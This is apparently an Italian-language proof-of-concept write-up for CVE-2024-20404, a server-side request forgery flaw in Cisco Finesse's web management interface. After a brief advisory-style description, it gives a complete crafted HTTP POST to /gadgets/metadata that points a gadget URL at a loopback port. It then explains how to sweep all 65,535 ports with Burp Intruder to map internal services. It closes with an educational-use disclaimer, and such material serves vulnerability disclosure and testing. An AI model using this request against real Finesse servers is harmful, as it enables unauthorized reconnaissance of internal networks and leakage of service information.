
Proof-of-concept exploit per CVE-2024-20404 che dimostra SSRF nell'interfaccia di gestione basata sul web di Cisco Finesse, consentendo l'enumerazione delle porte interne e la divulgazione limitata di informazioni.
Una vulnerabilità nell'interfaccia di gestione basata sul web di Cisco Finesse potrebbe consentire a un attaccante remoto non autenticato di condurre un attacco SSRF su un sistema interessato.
Questa vulnerabilità è dovuta a una validazione insufficiente dell'input fornito dall'utente per specifiche richieste HTTP inviate a un sistema interessato. Un attaccante potrebbe sfruttare questa vulnerabilità inviando una richiesta HTTP appositamente predisposta al dispositivo interessato. Uno sfruttamento riuscito potrebbe consentire all'attaccante di ottenere informazioni sensibili limitate per i servizi associati al dispositivo interessato.
<target> con il tuo.POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

Usa l'intruder di Burp Suite per scansionare tutte le porte aperte sul server di gestione basato sul web di Cisco Finesse, modificando il numero di porta da 1 a 65535.
Vedrai la risposta "Connection refused" sulle porte chiuse.


Questa è solo una Prova di Concetto (PoC) per dimostrare che l'interfaccia di gestione basata sul web di Cisco Finesse è vulnerabile al Server Side Request Forgery (SSRF), e questa PoC è solo a scopo educativo. Usala in modo responsabile e solo su sistemi con autorizzazione esplicita per i test. L'uso improprio di questa PoC può comportare gravi conseguenze.